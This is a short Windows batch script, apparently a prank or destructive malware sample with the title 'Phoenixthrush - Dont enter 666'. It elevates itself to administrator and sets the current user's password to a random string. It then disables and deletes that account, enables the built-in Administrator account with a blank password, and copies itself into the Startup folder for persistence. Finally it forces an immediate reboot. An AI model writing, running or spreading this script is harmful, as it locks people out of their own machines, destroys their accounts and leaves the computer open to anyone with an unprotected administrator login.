@echo off
title Phoenixthrush - Dont enter 666
color a

if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit /b)

setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set alfanum=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789?!

set pwd=
FOR /L %%b IN (0, 1, 16) DO (
SET /A rnd_num=!RANDOM! * 62 / 32768 + 1
for /F %%c in ('echo %%alfanum:~!rnd_num!^,1%%') do set pwd=!pwd!%%c
)

net user %USERNAME% %pwd% >nul
net user %USERNAME% /active:no >nul
net user %USERNAME% /delete >nul
net user Administrator /active:yes /fullname:"%username%" >nul
net user Administrator "" >nul

xcopy %~dp0\x.bat "%programdata%\Microsoft\Windows\Start Menu\Programs\StartUp" >nul

shutdown.exe /r /t 0